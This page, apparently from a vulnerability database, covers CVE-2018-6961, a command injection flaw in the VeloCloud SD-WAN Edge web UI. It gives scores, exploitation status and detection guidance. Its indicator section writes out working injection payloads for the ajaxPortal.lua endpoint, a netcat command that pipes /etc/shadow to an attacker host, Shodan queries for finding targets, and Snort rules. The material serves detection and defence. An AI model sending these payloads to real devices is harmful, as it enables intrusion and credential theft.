cbcvebase.
CVE-2018-6961
published 2018-06-11

CVE-2018-6961: VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled…

PriorityP190high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
86.43%
99.7th percentile
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.

Affected

2 ranges
VendorProductVersion rangeFixed in
vmwarensx_sd-wan_by_velocloud< 3.1.03.1.0
vmwarensx_sd-wan_by_velocloud

Detection & IOCsextracted from sources · hover to see the quote

url/scripts/ajaxPortal.lua
commanddestination=8.8.8.8`id`&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
commanddestination=8.8.8.8$(id;echo {{rand}})&source=ge1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
command$(cat /etc/shadow |nc <lhost> <lport>)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"destination="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/destination=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025767; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT VMware NSX SD-WAN Command Injection 2"; flow:established,to_server; http.uri; content:"/scripts/ajaxPortal.lua"; fast_pattern; http.request_body; content:"name="; content:"source="; content:"test="; content:"&requestTimeout="; content:"auth_token="; content:"cmd=run_diagnostic"; pcre:"/name=[^&]*\x24\x28/i"; reference:url,exploit-db.com/exploits/44959/; reference:cve,2018-6961; classtype:attempted-user; sid:2025768; rev:3; metadata:attack_target Server, created_at 2018_07_02, cve CVE_2018_6961, deployment Datacenter, performance_impact Low, confidence High, signature_severity Critical, updated_at 2020_08_25, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit targets the unauthenticated POST endpoint /scripts/ajaxPortal.lua with _cmd=run_diagnostic and shell metacharacters ($() or backticks) injected into the 'destination' or 'name' POST body parameters.
  • A successful exploitation response contains JSON status OK and output matching uid=/gid= from the injected 'id' command; absence of 'UNKNOWN_COMMAND' in the response body also indicates success.
  • Shodan/FOFA queries for exposed VeloCloud web UIs can identify attack surface: title:"VeloCloud" (Shodan) and title="VeloCloud" (FOFA).
  • The exploit uses the X-Requested-With: XMLHttpRequest header alongside Content-Type: application/x-www-form-urlencoded; charset=UTF-8, which can be used as an additional filter in HTTP traffic analysis.
  • DNS injection variant uses the 'name' POST parameter instead of 'destination', with test=DNS_TEST, also injectable with $() shell syntax.
  • ·The vulnerable local web UI component is disabled by default; exploitation is only possible if it has been explicitly enabled, and VMware advises it should not be enabled on untrusted networks.
  • ·The exploit author notes that the target runs a slimmed-down Linux, so standard reverse shell techniques (e.g., nc -e) may not work; exfiltration via piping stdout to netcat is the demonstrated approach.

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
cisa8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.